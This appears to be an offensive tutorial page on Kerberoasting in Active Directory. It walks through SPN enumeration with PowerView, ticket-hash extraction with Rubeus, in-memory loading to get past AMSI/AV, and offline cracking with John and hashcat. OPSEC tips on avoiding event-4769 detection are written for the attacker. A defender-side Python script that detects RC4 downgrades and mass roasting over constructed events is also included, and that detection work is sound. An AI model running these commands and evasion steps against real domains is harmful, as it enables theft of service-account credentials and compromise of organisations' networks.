
Kerberoasting Attack

What is Kerberoasting Attack?

Kerberoasting is a technique for recovering the plaintext passwords of service accounts in Active Directory. Any authenticated domain user can request a service ticket (TGS-REQ) for any account that has a Service Principal Name (SPN) set. The encrypted part of that ticket is protected with the service account's long-term key, which is derived from its password (the NT hash for RC4, etype 23; a PBKDF2-derived key for AES, etypes 17/18). The ticket can therefore be taken off the network and cracked offline, with no further interaction with the domain controller.

Key Concepts

  • SPN (Service Principal Name): A unique identifier that ties a service instance (MSSQLSvc, HTTP, etc.) to the account it runs as. Accounts with an SPN are the roastable ones.

  • TGS (Ticket Granting Service): The KDC component that issues service tickets. The ticket it returns is encrypted with the service account's key, so if that account has a weak password the ticket can be cracked.

  • Offline Cracking: Brute-forcing the ticket on an attacker-controlled machine. No further requests go to the DC, so there are no additional logs and no account lockouts.

Enumeration

# PowerView: list accounts that have an SPN set
. C:\AD\Tools\PowerView.ps1
Get-DomainUser -SPN
Get-DomainUser -SPN | Select-Object samaccountname, serviceprincipalname
# ActiveDirectory module (the DLL can be loaded directly, without installing RSAT)
Import-Module C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName | Select-Object SamAccountName, ServicePrincipalName

Hash Extraction

# Summarise roastable accounts by supported encryption type and pwdLastSet year, without requesting any tickets
C:\AD\Tools\Rubeus.exe kerberoast /stats
# Roast a single account; /simple prints only the hash line
C:\AD\Tools\Rubeus.exe kerberoast /user:svcadmin /simple
# /rc4opsec uses the tgtdeleg trick and skips AES-enabled accounts, so only tickets the KDC would issue as RC4 anyway are requested
C:\AD\Tools\Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec /outfile:C:\AD\Tools\hashes.txt
# Loader.exe loads Rubeus in memory instead of dropping it to disk, to get past AMSI/AV
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args kerberoast /user:svcadmin /simple /rc4opsec /outfile:C:\AD\Tools\hashes.txt

OPSEC

  • Avoid mass roasting: Every service ticket request logs a 4769 event on the DC, and one user or host requesting tickets for many SPNs in a short burst is the classic Kerberoasting signature. Pick targets from the enumeration output and roast them one at a time with /user.

  • Ignore system accounts: Do not target krbtgt (it shows up in SPN enumeration via kadmin/changepw). Its password is long, random, and rotated by the system, so cracking it is infeasible.

  • Prefer RC4, but only where it is normal: RC4 (etype 23) tickets are far cheaper to crack than AES (etypes 17/18), which require a PBKDF2 key derivation per guess. An RC4 ticket for an account that advertises AES in msDS-SupportedEncryptionTypes is a downgrade the KDC would not do on its own, and 4769 events with encryption type 0x17 for such accounts are a common detection. /rc4opsec restricts roasting to accounts without AES enabled for exactly this reason.
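To make the OPSEC points concrete from the defender's side, here is an added example (not part of the original page) of the two detections the bullets above are trying to avoid, run over constructed 4769 events. The SPN accounts, their msDS-SupportedEncryptionTypes values, the requester names, IPs and the thresholds are all assumptions for illustration; the etype values and attribute bits are the documented Windows ones.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# msDS-SupportedEncryptionTypes bits (Microsoft-documented values).
RC4_HMAC, AES128_CTS, AES256_CTS = 0x4, 0x8, 0x10
# Event 4769 TicketEncryptionType values.
ETYPE_RC4, ETYPE_AES128, ETYPE_AES256 = 0x17, 0x11, 0x12

# Constructed directory snapshot: hypothetical SPN accounts and the etypes they advertise.
SPN_ACCOUNTS = {
    "svcadmin": RC4_HMAC | AES128_CTS | AES256_CTS,  # AES-capable: an RC4 ticket for it is a downgrade
    "svcsql": RC4_HMAC,                               # legacy RC4-only: RC4 tickets are normal here
}


def _parse(events):
    """(time, TargetUserName, IpAddress, ServiceName, TicketEncryptionType, Status) -> sorted dicts."""
    rows = [dict(time=datetime.fromisoformat(t), user=u, ip=ip, service=s, etype=e, status=st)
            for t, u, ip, s, e, st in events]
    return sorted(rows, key=lambda r: r["time"])


def _is_roastable(service):
    # Machine accounts and krbtgt are not useful Kerberoast targets; drop them to cut noise.
    return not service.endswith("$") and service.lower() != "krbtgt"


def rc4_downgrade_alerts(events):
    """RC4 (0x17) service tickets for accounts that advertise AES. The KDC picks the strongest
    etype both sides support, so this only happens when the client asked for RC4 on purpose."""
    alerts = []
    for r in _parse(events):
        if r["status"] != 0 or not _is_roastable(r["service"]):
            continue
        supported = SPN_ACCOUNTS.get(r["service"], 0)
        if r["etype"] == ETYPE_RC4 and supported & (AES128_CTS | AES256_CTS):
            alerts.append(f"{r['user']} from {r['ip']} got an RC4 ticket for AES-capable {r['service']}")
    return alerts


def mass_roast_alerts(events, max_spns=5, window=timedelta(minutes=10)):
    """One requester (user + IP) obtaining tickets for >= max_spns distinct SPN accounts inside a
    sliding window. Both thresholds are assumptions to tune against the environment's baseline."""
    recent, fired, alerts = defaultdict(deque), set(), []
    for r in _parse(events):
        if r["status"] != 0 or not _is_roastable(r["service"]):
            continue
        key = (r["user"], r["ip"])
        q = recent[key]
        q.append((r["time"], r["service"]))
        while r["time"] - q[0][0] > window:
            q.popleft()
        distinct = {s for _, s in q}
        if len(distinct) >= max_spns and key not in fired:
            fired.add(key)
            alerts.append((key, sorted(distinct)))
    return alerts


# Constructed 4769 events (not real logs): one admin's normal activity, then a roasting burst.
SAMPLE_4769 = [
    ("2024-05-01T09:00:01", "bob@CORP.LOCAL", "10.0.0.9", "svcsql", ETYPE_RC4, 0),
    ("2024-05-01T09:00:05", "bob@CORP.LOCAL", "10.0.0.9", "WS01$", ETYPE_AES256, 0),
    ("2024-05-01T09:10:00", "jdoe@CORP.LOCAL", "10.0.0.5", "svcadmin", ETYPE_RC4, 0),
    ("2024-05-01T09:10:01", "jdoe@CORP.LOCAL", "10.0.0.5", "svcsql", ETYPE_RC4, 0),
    ("2024-05-01T09:10:02", "jdoe@CORP.LOCAL", "10.0.0.5", "svcweb", ETYPE_RC4, 0),
    ("2024-05-01T09:10:03", "jdoe@CORP.LOCAL", "10.0.0.5", "svcbackup", ETYPE_RC4, 0),
    ("2024-05-01T09:10:04", "jdoe@CORP.LOCAL", "10.0.0.5", "svcscan", ETYPE_RC4, 0),
    ("2024-05-01T09:10:05", "jdoe@CORP.LOCAL", "10.0.0.5", "krbtgt", ETYPE_AES256, 0),
]

if __name__ == "__main__":
    for a in rc4_downgrade_alerts(SAMPLE_4769):
        print("ALERT downgrade:", a)
    for (user, ip), spns in mass_roast_alerts(SAMPLE_4769):
        print(f"ALERT mass roast: {user} from {ip} -> {', '.join(spns)}")
```

Note the asymmetry the bullets describe: bob's RC4 ticket for the RC4-only svcsql account is silent, while jdoe's single RC4 ticket for the AES-capable svcadmin fires on its own, and the five-SPN burst fires independently of the encryption type. Roasting one AES-enabled account at a time with RC4 still trips the first rule; /rc4opsec avoids it by never asking.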

Cracking Offline

# Important: remove the port (e.g., :1433) from the SPN in the hash file before running John
C:\AD\Tools\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hashes.txt
# Mode 13100 is Kerberos 5 TGS-REP etype 23 (RC4-HMAC); AES tickets need 19600 (etype 17, AES128) or 19700 (etype 18, AES256) and crack far more slowly
hashcat -m 13100 -a 0 hashes.txt wordlist.txt

Wordlists & Custom Dictionaries

  • SecLists: A large collection of lists for security assessments (passwords, usernames, fuzzing payloads). Start with rockyou.txt or a password list matched to the target's password policy.
  • CeWL: A custom word list generator that spiders a given URL and builds a dictionary from the words found on the site (company names, products, locations), which is ideal for targeted cracking of service account passwords.